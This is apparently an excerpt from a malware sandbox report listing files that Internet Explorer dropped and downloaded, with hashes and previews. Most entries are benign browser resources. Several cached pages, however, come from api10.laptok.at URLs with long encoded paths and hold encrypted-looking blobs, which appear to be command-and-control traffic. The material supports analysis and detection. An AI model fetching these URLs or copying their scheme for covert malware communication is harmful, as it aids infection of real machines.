                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):653
                                                                                                                                      Entropy (8bit):5.078062345810726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNx0n0KdWpKdWX4nWimI002EtM3MHdNMNx0n0KdWpKdWX4nWimI00ObxEty:2d6Nx0rfK4SZHKd6Nx0rfK4SZ7nb
                                                                                                                                      MD5:74D54AEF719C33D18E3B3ABB0CA5BAAC
                                                                                                                                      SHA1:A94F71BE8198C097B5E82DE0F1D3FD80A58CE94E
                                                                                                                                      SHA-256:3106D23C3F43BBE6E7303878930A376216223BA71FB35F303300D38CDEC888F2
                                                                                                                                      SHA-512:DD81C7461CE3FD8C7717E12132E790C26F8D9005E0AA2FAB0A69BC17A60B3E7889C2CF38779EBAE671EA708C4B9A122F92E1B2AF75685FDFABF4CE53D5303CE8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):656
                                                                                                                                      Entropy (8bit):5.115180936428906
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxx0OpOX4nWimI002EtM3MHdNMNxx0OpKdWX4nWimI00Ob6Kq5EtMb:2d6NxW4SZHKd6NxoK4SZ7ob
                                                                                                                                      MD5:663C96EF5063DF9CDE299E8DA5CBDBFF
                                                                                                                                      SHA1:38F6EA7AC5756E43A0815E73D3A0D423E6927C5D
                                                                                                                                      SHA-256:278F923B5FECB5C0405D1C6CEDC3BF5F5E73D21374EC8EB9D20683334295C3AD
                                                                                                                                      SHA-512:ABB0CDEA2F4E3C831A23745B711981E56F1036E50D7292BB22DF35ACE4EAA9125593E9EBF9268297B8EEFA95BE3EB805FBF1AC3A9161824F0D657F515C66C8C5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):659
                                                                                                                                      Entropy (8bit):5.1243145832336445
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxcsUxUX4nWimI002EtM3MHdNMNxcsUxUX4nWimI00ObVEtMb:2d6Nxv4SZHKd6Nxv4SZ7Db
                                                                                                                                      MD5:ED9176B3D75A7C27CB5763C41A1AE91D
                                                                                                                                      SHA1:D1EB120E09624DB29FD74251D32DA4392A1E7F5C
                                                                                                                                      SHA-256:D585B4EEF70FA5D1E181D5789B46113207663E3820ADBF83DC2ADA049AD642D0
                                                                                                                                      SHA-512:BD17014708F89A12410E90B0534A40A04719C2BC32738976BCC18EAAE2BD084177F44A8070829878BD0E7BD22A9EDC9B8625D87E2E9BE324B36C19DB8A5958AE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):653
                                                                                                                                      Entropy (8bit):5.072911264014693
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxfn0OpOX4nWimI002EtM3MHdNMNxfn0OpOX4nWimI00Obe5EtMb:2d6NxI4SZHKd6NxI4SZ7ijb
                                                                                                                                      MD5:0BAE92F55D07580AACAF7BB17C6423C7
                                                                                                                                      SHA1:0327680EBC8E79B6C957F3116FC9A8A33C5EC000
                                                                                                                                      SHA-256:ABB47EDD851CC71FB9D738D3B586FAE86FA4F430420874E1BD46D0B6481328DF
                                                                                                                                      SHA-512:A3F0F833843E1F5FF42019CDCBBA5870C0E52DB325DE3A7750AF2E1C36752EA7901E8B33C1BF77BEB096BB6E3CD376B1B4160557550F2F8AB93CC1A1A68610B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\c[1].htm
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):2400
                                                                                                                                      Entropy (8bit):5.975522616591464
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:T2ECG/vT+XLMHbLRCI24UCknBdpK2jgPOKipWUlgrjDu5pODzMHxW:KECGT+XqLxwnBbK8WUlqqaHMHxW
                                                                                                                                      MD5:E69A66BA1BFF6972458D1BC41252EE98
                                                                                                                                      SHA1:262423E195EE52FE55A2FA3CCD97E9B6619117A5
                                                                                                                                      SHA-256:F1D70F929CDCB80F5CD8AAE9F8A41AB63FA171F224206A020596F73E88E384B2
                                                                                                                                      SHA-512:5EBDB4B48518CD539BE0ED3CC3EE25996D14A8E473DD0F0261439BF04F416902E6ACDA45E00DEF009CAD129EBC4EAD09A791357AACC3B829C4973080783BEEA7
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:http://api10.laptok.at/api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2BId1l8xoRD/ZIKmgZ4Hr1ogBm_2Ft/cJTdN_2F0/sOkKUhNEij9EeyBjgxaS/fAWTeONzVOzjyGfrZxL/sesogOMoxfuQAI6mdY73Xa/BaJEnujvmw_2B/vRpLGOj_/2Bvahak4rScm4JpMfQfaO8m/3X9wT7Vyfk/qviTv3J0IbAJn2nUb/wbGIEFwb6Ch2/LDOx1illPXc/Hz_2BbvAx_2Fcr/j_0A_0DiinRm69PA4aJZ4/DJR7fgT5XYyNTfe4/_2FOY_2B_2/BAPo2cJ8YkUi/c
                                                                                                                                      Preview: DnobSCt1acMLFsADNayhTZdaOfIuV71NRKZHHWnAGjoBIui5QG57YKyKNVOyL+zVwyrVuY5JbkTcKoHdRv/9ePWkpxcJKYZgxcF0rwtfpRcD7pGcRemPj2cqe79rGwYYIMtAvaYU74+Vn9T8zJ6m7Z4B3FWxGP7uKILEfJ07sG9J8KJ2lHPgZO/wzeS/zePRIYrCT/y9LgGj2vBWJ3GUsl9HA86aiXB6KubePlvwVTXOhj5FtyPo5bIRdm+NRRe0lh0BZuKHprUEzv66hkW36EVlw653bE6CIWe1AQeoGH9xYtJVCNDk5f1jhZKYMeSNIsHWxtdSYXq6gimI48VGPYfb75q12pdqPATTaCwMOifpnH+DDgJN8tFby8y+on9NZMUrBKJzxzLPJxb5Dp4oNQhX4Xz1BOQfOA0QovUjfzgLZSdfDC9iCVURu3oFy3AlObvlokn26IOHTIaKH8JRyGu6UyxxlkTkeFb60ZQ0QDV7T5Tocg7JOmSC9k0+GFuaB2Vq0/sBR2KS07n58zJx/qhviv/dDJAMQ/KCx8uj0ziJ4QH4zOSt3IF4ldDKpyEIyJpZw5iUplcOhqk/20g0lcZk/aX9wV7Ul1ehExIs8aRpgOWJbEW5Anaqs1vuBDoV5VZhbiw/qJm9XZsM7FENPZIRi4L4N/3/qZxbQGGQRhCNRTju995dOkAHIcLBdSV8ZXt8gZHOaVht6KZs5pdBCYFcCkkWuB7mp3V/cpg40FIuPpAXlhl3A+YkgiPorTap/JRrLkF2PPLHaaEMg8tXNuDMWgTEQ98SxdMfv0ri4jDj/zG2E+anMa568WfVUYg+co4YF3trNY7+3kKKfTGSXitWdmo7oMHyKVVoKYAHqNQICJoYtdap67qE6WAAqktSKoRR+0/fdetpF6IylEoZoyY9mC7oCTwbWRUXzL7zINyxbW3oJnlQd5HGLVr8+0M4FnEVSO70ktdW0OFE7e4bFVTwjUuYY2A07QVrO96D
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):748
                                                                                                                                      Entropy (8bit):7.249606135668305
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                      MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                      SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                      SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                      SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):4720
                                                                                                                                      Entropy (8bit):5.164796203267696
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                      MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                      SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                      SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                      SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                                                                                                                      Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):2168
                                                                                                                                      Entropy (8bit):5.207912016937144
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                      MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                      SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                      SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                      SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
                                                                                                                                      Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\bullet[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):447
                                                                                                                                      Entropy (8bit):7.304718288205936
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                      MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                      SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                      SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                      SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/bullet.png
                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\xxdXe7[1].htm
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):338016
                                                                                                                                      Entropy (8bit):5.999979867333796
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:h7OGXHIEr+zisK8tb3/VKph5ur8FlLivxSZXKoWEPws/2ImLLW4Ytb31Zmqq:N1iis338p6r8lLi5ScrUwwjsC4YtbFYV
                                                                                                                                      MD5:AB868B345CA418AA4FACC6D46BD38178
                                                                                                                                      SHA1:A0A4189DC35EF39534A2EE41980275348B7AA8EE
                                                                                                                                      SHA-256:DAA9372E5A21C9079A646855110C83154D77B5E6DF2F37E949EA8452ABC1EF27
                                                                                                                                      SHA-512:1AE9D9E1D1C2BB3972433EBCE0DB8CAEEDA67AA93D1C8F09452593D67E59936446486B47B0C0775DF26F484479EB79818FC1D05526C6556B132FACB08A2A9D9C
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:http://api10.laptok.at/api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpMr1MDEw/8l5rivX8vq0IZvK/gytYP5KOz0bdswPdPN/6JGFOawx9/jpz_2BKRYx6fKknk6pLW/tx_2FYdaEgf9TmZuTdQ/f0Tk4GzxbBo7nnpsJmyPiM/W7szWBXzIZ6B_/2B8hrjTH/_2FrpOMZRaBZ4xFjuf_2BhE/JcjrUYnllh/M19_2FdjJ2_2FYdJX/M9eFNCYNWFr2/TTPz7w_2FLg/lSv_0A_0DYUGze/qKcuuFgLExC0zUYAUDG_2/FUUaL9urgqUlfkic/Xw_2BsrLR7ACrKS/P753hBNv6/xxdXe7
                                                                                                                                      Preview: hfUxqII5Ucqr2j8G0pSsTUuRmxcFmoXcLmjRBGjBaQQjiDhA7mumvDgeD/0tofjz+W8FCeTcggnq2pG2/2dNgiJYlJW0RCu98vw8Djsgvml9iYg8qaAvHSJCZOSTOfUWEbxo+NpORUwIIznyDtzgZcwokYZzLi15HQOfj+1DZJ3R1ZFmPQvSQ4b++fE8BvPhiT+t1AwGGj5aXeZjPCtzot/33P+dl9duvr9qk16vXdWpTO9FBJKWhKFnm99hQtte5/A+WXyHIg6kH2fRPWkpAAeAjx6GTgrdqyJ5ta8I0Teer8YPp2JLzAz1CBTkRC7j2bRE4pDMpNpn7JOAACUG/6dZi5Yst1MW8DfBSF6VrUToD8ZRo25HLorSmnYnqFEtORzQr24udRjr6vNrEEDxhv1aKVDf8yflSZ708nHYqykcHeq76BV8yPDFpMXdDSs8dck4afi48/xE3PRUZLbrMUC4wao51w+iBr2rsoeZ8k0g+PpkJj4yw8c0Sf0n3T2B3HvSvFEKKIGAHb0pE4rOJA6dOR0cuDOwJFkIscNL7ADK+OjdgFpxAn157U7+IAB9LnyqsP6/mNDEXiSen3NFOwFnFU6hfeC+G48BfKnq/qvuvQIZ+0P+Px+2QfYAaN4XMdGG4GSbV1hcgcrYlmJinwCuwry7nqwOJJTMO6aG2akKHxmOqULD9g0jScx3WiO2T/Iu3MJzOPRYkMReKQTQS5z52ojXVb8vEhsQWrqP00AYUzz8Ohm33hI3Fus+CF8kbgpLSV4KHLmNrwGxMZGMT7b6p8ymYWB8Z9onfS3JhUwnKkRNa5uaBcpe/pel5XN55d85MgnQx/IJXCtj5/gbX6LjdyEaZDGXga1Il7Aq/73O0ADxir3dVXudlyrcl8VDWBGshmjMxLf9g7BphGB9Jv6r7vi+BLDeIaJ43iCMusF5WfEegCmtpXa8y6IVUuQT5dUKlWn40gwfaejEyaaP7aY6diF0/062DbkOLv2x
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\background_gradient[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):453
                                                                                                                                      Entropy (8bit):5.019973044227213
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                      MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                      SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                      SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                      SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/background_gradient.jpg
                                                                                                                                      Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):12105
                                                                                                                                      Entropy (8bit):5.451485481468043
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                      MD5:9234071287E637F85D721463C488704C
                                                                                                                                      SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                      SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                      SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                      Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\7[1].htm
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):267700
                                                                                                                                      Entropy (8bit):5.999877808101812
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:0GtBeRO1EXAR18gvZYQhlTIorpKkFqBCf:/tgROGm1qEl9rpKhi
                                                                                                                                      MD5:BF32F421FA2847FAA8DB0BE9201BA6DE
                                                                                                                                      SHA1:FD7A60D7431272DD5906940F08933E9A86A4283B
                                                                                                                                      SHA-256:FCA7FA4DFFAD605B97E30A75F5847E54E1B16D89B13C2542ACA5B1208F400F9A
                                                                                                                                      SHA-512:56E1D7C7AFF4A81EAF3209EA2F1812960260D8BDBC0DC3B3501D78C48FC978D8C431714063D98D1EEF2D88F47B32E45BD9F59596DCE4FC82DB54CFA382D32649
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:http://api10.laptok.at/api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4DrZmcsV/dPovDeCz_2Bns7/SzRlXKXDTcnNvTwVof3JC/9OHXqekyZyAtiU_2/FKiPw6K2S4WkVU2/jPZ3OPDfyBZIrPRMr3/FBdYtTIJr/eK7MjotByUG0UytbsrJ_/2BIobg6gkWRSCkFALiR/3H39hT7Vg1tNx00aR3HUuS/eyDURwI5Q5dTx/nK0Boek7/Pnsv74L6CwFu08_0A_0D5Cn/saoDbWMFDu/ABzmmLf_2BuodD1FH/_2Ftl0V1Zs5G/QPAAHiHJ/7
